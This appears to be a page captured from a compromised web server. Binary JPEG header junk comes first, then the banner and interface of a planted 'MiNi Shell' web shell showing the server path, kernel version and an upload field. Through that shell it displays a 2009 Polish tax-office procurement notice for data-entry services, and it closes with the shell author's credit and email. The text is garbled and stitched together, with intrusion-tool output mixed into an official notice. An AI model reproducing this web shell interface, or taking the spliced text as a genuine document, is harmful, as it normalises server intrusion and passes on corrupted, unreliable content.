JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090113/13963-N-2009.html

<p class="kh_header"><b>Gliwice: świadczenie usług w zakresie komputerowego wprowadzania danych oraz dodatkowych usług biurowych</b><br>
<b>Numer ogłoszenia: 13963 - 2009; data zamieszczenia: 13.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Drugi Urząd Skarbowy w Gliwicach , ul. Młodego Hutnika 2, 44-100 Gliwice, woj. śląskie, tel. 032 3399803, faks 032 2704017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.isnet.katowice.pl/us/gliwice2.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług w zakresie komputerowego wprowadzania danych oraz dodatkowych usług biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług w zakresie komputerowego wprowadzania danych oraz dodatkowych usług biurowych.
Przedmiot zamówienia podzielony został na 15 części (zadań). 
Zamawiający dopuszcza składanie ofert częściowych na wykonanie poszczególnych zadań przez poszczególne osoby fizyczne według zasady: oferta jednego wykonawcy na wykonanie jednego zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.02.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca złoży dokumenty wymienione w punkcie VI SIWZ. 
2. W postępowaniu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 uPzp, spełniający warunki i wymagania określone w SIWZ oraz w art. 22 uPzp. 3. Sytuacja finansowa Wykonawcy pozwala na realizację zamówienia.  Za znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia uważany będzie podmiot, który nie zalega z opłacaniem podatków oraz składek na ubezpieczenie zdrowotne lub społeczne, lub uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności. Ocena spełnienia warunków udziału w postępowaniu odbędzie się na podstawie dokumentów złożonych przez Wykonawcę wraz z ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Osoby fizyczne nie prowadzące działalności gospodarczej zobowiązane są złożyć w ofercie dokumenty wymienione w poniższych punktach 3, 3a, 4, 5, 6, 7 (brak któregokolwiek dokumentu lub wypełnienie Załącznika Nr 2a lub Nr 3a zmieniające ich treść spowoduje wykluczenie wykonawcy z postępowania lub odrzucenie oferty). 

Wykonawca będący podmiotem wykonującym działalność gospodarczą zobowiązany jest złożyć w ofercie dokumenty wymienione w poniższych punktach 1, 3.3b, 4, 5, 6, 7 oraz w punkcie 2, jeśli go dotyczy.

Zamawiający wymaga złożenia w ofercie następujących dokumentów/oświadczeń/zaświadczeń czy informacji:
1.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert tj. 22.07.2008r. 
Wymienione dokumenty powinny w sposób jednoznaczny wskazywać osoby umocowane do podpisywania oferty w imieniu wykonawcy. Jeżeli w/w dokumenty nie pozwalają stwierdzić umocowania do składania oświadczeń woli w imieniu wykonawcy, jego obowiązkiem jest załączyć stosowny dokument do oferty - np. pełnomocnictwo, czy też upoważnienie. Wymogiem staje się wtedy, aby załączony dokument został przedstawiony w formie:
-	  oryginału, 
-	  lub notarialnie poświadczonej kserokopii,
-	lub kserokopii poświadczonej przez osobę , która udzieliła pełnomocnictwa. 
2.	ewentualnej umowy regulującej współpracę podmiotów występujących wspólnie. 
W takim przypadku należy przedstawić również dokument, który określa pełnomocnika do reprezentowania ich w tym postępowaniu.

3.	w celu potwierdzenia, iż wykonawca posiada niezbędną wiedzę i doświadczenie w wykonywaniu tego rodzaju usług należy złożyć w ofercie: 
3a. osoba fizyczna nie prowadząca działalności gospodarczej: umowę na wykonywanie tego rodzaju usług z ostatnich 5 lat lub zaświadczenie o ukończeniu kursu komputerowego maszynopisania.
3b. Wykonawca będący podmiotem wykonującym działalność gospodarczą: zaświadczenie o ukończeniu kursu komputerowego maszynopisania przez osobę, która będzie wykonywała usługę. 
Wymagane powyżej dokumenty są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do reprezentowania wykonawcy.
4.	wypełnionego formularza ofertowego stanowiącego Załącznik Nr 2a lub 2b do SIWZ. 
5.	wypełnionego formularza cenowego stanowiącego Załącznik Nr 3a lub 3b do SIWZ.
6.	podpisanego projektu umowy (jak w ust. V pkt 2) stanowiącego Załącznik Nr 4 do SIWZ.
7.	wypełnionego formularza - oświadczenie o spełnieniu warunków udziału w postępowaniu - stanowiącego Załącznik Nr 5 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.isnet.katowice.pl/us/gliwice2.htm.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Drugi Urząd Skarbowy w Gliwicach, ul. Młodego Hutnika 2, pokój nr 104 
(I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2009 godzina 10:00, miejsce: Drugi Urząd Skarbowy w Gliwicach, ul. Młodego Hutnika 2, 44-100 Gliwice, pokój nr 104 (decyduje data wpływu do pokoju 104).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 (VAT).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rejestracja wniosków o wydanie zaświadczenia potwierdzającego brak obowiązku uiszczenia bądź uiszczenie podatku od towarów i usług z tytułu nabycia środka transportu w systemie POLTAX, ich wydruk z systemu Biblioteka Akt oraz inne czynności związane z ich wydawaniem.
2.	Sporządzanie informacji o podatnikach, którzy złożyli więcej niż przyjęta ilość wniosków VAT-24 po 01.05.2004r., a nie są zarejestrowani jako osoby prowadzące działalność gospodarczą.
3.	Wysyłanie wezwań do podatników, którzy nie złożyli deklaracji VAT-7.
4.	Rejestracja złożonych przez podatników remanentów likwidacyjnych
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 (RP).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa zeznań rocznych w zakresie:
 - badania poprawności wprowadzenia do systemu Poltax 2b danych wynikających z zeznań,
 - rejestracji zrealizowanych przelewów
Termin wykonania od 01 lutego 2009r. do 31 sierpnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadania nr 3-8 (WD).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyjmowanie zeznań podatku dochodowego od osób fizycznych o wzorach PIT-36, PIT-36L, PIT-37, PIT-38.
2.	Wprowadzanie danych z zeznań wraz z załącznikami do systemu komputerowego POLTAX 
3.	Sporządzanie potwierdzeń złożenia zeznania oraz wydawanie oryginału podatnikowi.
Termin wykonania od 01 lutego 2009r. do 31 lipca 2009r.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadania nr 3-8 (WD).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyjmowanie zeznań podatku dochodowego od osób fizycznych o wzorach PIT-36, PIT-36L, PIT-37, PIT-38.
2.	Wprowadzanie danych z zeznań wraz z załącznikami do systemu komputerowego POLTAX 
3.	Sporządzanie potwierdzeń złożenia zeznania oraz wydawanie oryginału podatnikowi.
Termin wykonania od 01 lutego 2009r. do 31 lipca 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadania nr 3-8 (WD).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyjmowanie zeznań podatku dochodowego od osób fizycznych o wzorach PIT-36, PIT-36L, PIT-37, PIT-38.
2.	Wprowadzanie danych z zeznań wraz z załącznikami do systemu komputerowego POLTAX 
3.	Sporządzanie potwierdzeń złożenia zeznania oraz wydawanie oryginału podatnikowi.
Termin wykonania od 01 lutego 2009r. do 31 lipca 2009r.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadania nr 3-8 (WD).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyjmowanie zeznań podatku dochodowego od osób fizycznych o wzorach PIT-36, PIT-36L, PIT-37, PIT-38.
2.	Wprowadzanie danych z zeznań wraz z załącznikami do systemu komputerowego POLTAX 
3.	Sporządzanie potwierdzeń złożenia zeznania oraz wydawanie oryginału podatnikowi.
Termin wykonania od 01 lutego 2009r. do 31 lipca 2009r.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadania nr 3-8 (WD).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyjmowanie zeznań podatku dochodowego od osób fizycznych o wzorach PIT-36, PIT-36L, PIT-37, PIT-38.
2.	Wprowadzanie danych z zeznań wraz z załącznikami do systemu komputerowego POLTAX 
3.	Sporządzanie potwierdzeń złożenia zeznania oraz wydawanie oryginału podatnikowi.
Termin wykonania od 01 lutego 2009r. do 31 lipca 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadania nr 3-8 (WD).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyjmowanie zeznań podatku dochodowego od osób fizycznych o wzorach PIT-36, PIT-36L, PIT-37, PIT-38.
2.	Wprowadzanie danych z zeznań wraz z załącznikami do systemu komputerowego POLTAX 
3.	Sporządzanie potwierdzeń złożenia zeznania oraz wydawanie oryginału podatnikowi.
Termin wykonania od 01 lutego 2009r. do 31 lipca 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadania nr 9-14 (EA).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowywanie potwierdzeń odbioru do wysyłanych pism.
2.	Opieczętowywanie korespondencji.
3.	Właściwa segregacja korespondencji wychodzącej i przychodzącej.
4.	Kompletowanie wszystkich pism w ramach jednej sprawy.
5.	Archiwizacja tytułów wykonawczych.
6.	Wprowadzanie tytułów wykonawczych.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadania nr 9-14 (EA).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowywanie potwierdzeń odbioru do wysyłanych pism.
2.	Opieczętowywanie korespondencji.
3.	Właściwa segregacja korespondencji wychodzącej i przychodzącej.
4.	Kompletowanie wszystkich pism w ramach jednej sprawy.
5.	Archiwizacja tytułów wykonawczych.
6.	Wprowadzanie tytułów wykonawczych.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadania nr 9-14 (EA).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowywanie potwierdzeń odbioru do wysyłanych pism.
2.	Opieczętowywanie korespondencji.
3.	Właściwa segregacja korespondencji wychodzącej i przychodzącej.
4.	Kompletowanie wszystkich pism w ramach jednej sprawy.
5.	Archiwizacja tytułów wykonawczych.
6.	Wprowadzanie tytułów wykonawczych.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadania nr 9-14 (EA).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowywanie potwierdzeń odbioru do wysyłanych pism.
2.	Opieczętowywanie korespondencji.
3.	Właściwa segregacja korespondencji wychodzącej i przychodzącej.
4.	Kompletowanie wszystkich pism w ramach jednej sprawy.
5.	Archiwizacja tytułów wykonawczych.
6.	Wprowadzanie tytułów wykonawczych.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadania nr 9-14 (EA).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowywanie potwierdzeń odbioru do wysyłanych pism.
2.	Opieczętowywanie korespondencji.
3.	Właściwa segregacja korespondencji wychodzącej i przychodzącej.
4.	Kompletowanie wszystkich pism w ramach jednej sprawy.
5.	Archiwizacja tytułów wykonawczych.
6.	Wprowadzanie tytułów wykonawczych.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadania nr 9-14 (EA).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowywanie potwierdzeń odbioru do wysyłanych pism.
2.	Opieczętowywanie korespondencji.
3.	Właściwa segregacja korespondencji wychodzącej i przychodzącej.
4.	Kompletowanie wszystkich pism w ramach jednej sprawy.
5.	Archiwizacja tytułów wykonawczych.
6.	Wprowadzanie tytułów wykonawczych.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 (PDFN).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	1.	Przyjmowanie zeznań rocznych.
2.	Wydawanie druków zeznań rocznych.
3.	Obsługa korespondencji z podatnikami.
4.	Rejestracja spraw w systemie Biblioteka Akt.
5.	Rejestracja odpisów/przypisów w systemie Poltax.
Termin wykonania od 01 lutego 2009r. do 31 grudnia 2009r..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 74.83.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com